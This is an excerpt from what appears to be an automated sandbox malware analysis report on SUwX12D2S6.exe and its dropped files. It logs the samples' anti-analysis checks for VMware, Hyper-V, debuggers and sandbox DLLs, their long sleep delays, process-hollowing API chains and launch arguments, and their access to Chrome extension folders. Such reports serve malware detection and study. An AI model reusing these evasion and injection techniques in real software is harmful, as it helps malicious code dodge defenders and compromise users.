Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: build2.exe PID: 7600, type: MEMORYSTR
Source: build2.exe, 00000008.00000002.1966489860.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0459C71C rdtsc 0_2_0459C71C
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 4_2_00481920
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 1_2_0040E670
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 4_2_0040E670
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Thread delayed: delay time: 700000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Window / User API: threadDelayed 5790
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Window / User API: threadDelayed 4209
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\SUwX12D2S6.exe TID: 7560 Thread sleep time: -700000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5480 Thread sleep count: 5790 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5480 Thread sleep time: -1302750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5480 Thread sleep count: 4209 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5480 Thread sleep time: -947025s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 1_2_0040FB98
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 4_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 4_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 4_2_0040FB98
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Thread delayed: delay time: 700000 Jump to behavior
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: SUwX12D2S6.exe, 0000000C.00000002.1864655252.0000000000788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW `
Source: SUwX12D2S6.exe, 00000004.00000003.1791733845.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/04/2023 10:55:35.770OFFICECL (0x1988)0x75cTelemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 21, "Time": "2023-10-04T09:55:05Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000004.00000003.1784292737.00000000097F2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: SUwX12D2S6.exe, 00000004.00000002.2244414394.0000000000828000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@w
Source: SUwX12D2S6.exe, 00000004.00000003.1789586242.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.0000000000728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: SUwX12D2S6.exe, 00000018.00000002.2117893429.00000000006B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: SUwX12D2S6.exe, 0000000C.00000002.1864753840.0000000000810000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000003.1863989873.0000000000810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQ
Source: SUwX12D2S6.exe, 00000004.00000003.1784292737.00000000097F2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: SUwX12D2S6.exe, 00000004.00000003.1793491574.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/04/2023 11:53:18.526OFFICECL (0x1db0)0x1dd4Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 17, "Time": "2023-10-04T10:52:48Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000001.00000002.1695073196.0000000000864000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000001.00000002.1695073196.000000000082F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1712281637.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4130188988.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1889987527.0000000000913000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.0000000000913000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1967987129.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864753840.0000000000810000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000003.1863989873.0000000000810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SUwX12D2S6.exe, 00000001.00000002.1695073196.0000000000847000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: build2.exe, 00000008.00000002.1967987129.00000000008B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: SUwX12D2S6.exe, 00000004.00000003.1794835170.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/04/2023 11:57:12.660OFFICECL (0x648)0x1fe0Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 20, "Time": "2023-10-04T10:57:11Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000004.00000003.1791973679.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/04/2023 11:52:10.031OFFICE~1 (0x1b38)0x1748Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:08Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000006.00000002.4130188988.00000000007B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: SUwX12D2S6.exe, 00000004.00000003.1792498139.00000000097F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 10/04/2023 11:52:10.346OFFICE~1 (0x708)0x1044Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 13, "Time": "2023-10-04T10:52:10Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
Source: SUwX12D2S6.exe, 00000004.00000003.1712281637.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2244414394.00000000008B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWEK
Source: C:\Users\user\Desktop\SUwX12D2S6.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0459C71C rdtsc 0_2_0459C71C
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0040909D IsDebuggerPresent, 0_2_0040909D
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0042A57A
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 4_2_00481920
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 1_2_00412220
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0459B0A3 push dword ptr fs:[00000030h] 0_2_0459B0A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E10042 push dword ptr fs:[00000030h] 0_2_05E10042
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_0442E0A3 push dword ptr fs:[00000030h] 3_2_0442E0A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE0042 push dword ptr fs:[00000030h] 3_2_05DE0042
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_00408568 GetProcessHeap, 0_2_00408568
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_00409028 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00409028
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004329EC
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004329BB SetUnhandledExceptionFilter, 1_2_004329BB
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_004329EC
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004329BB SetUnhandledExceptionFilter, 4_2_004329BB

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_05E10110
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Memory written: C:\Users\user\Desktop\SUwX12D2S6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Memory written: C:\Users\user\Desktop\SUwX12D2S6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Memory written: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Memory written: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Memory written: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Memory written: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Memory written: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe" Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe --Task
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe"
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe"
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
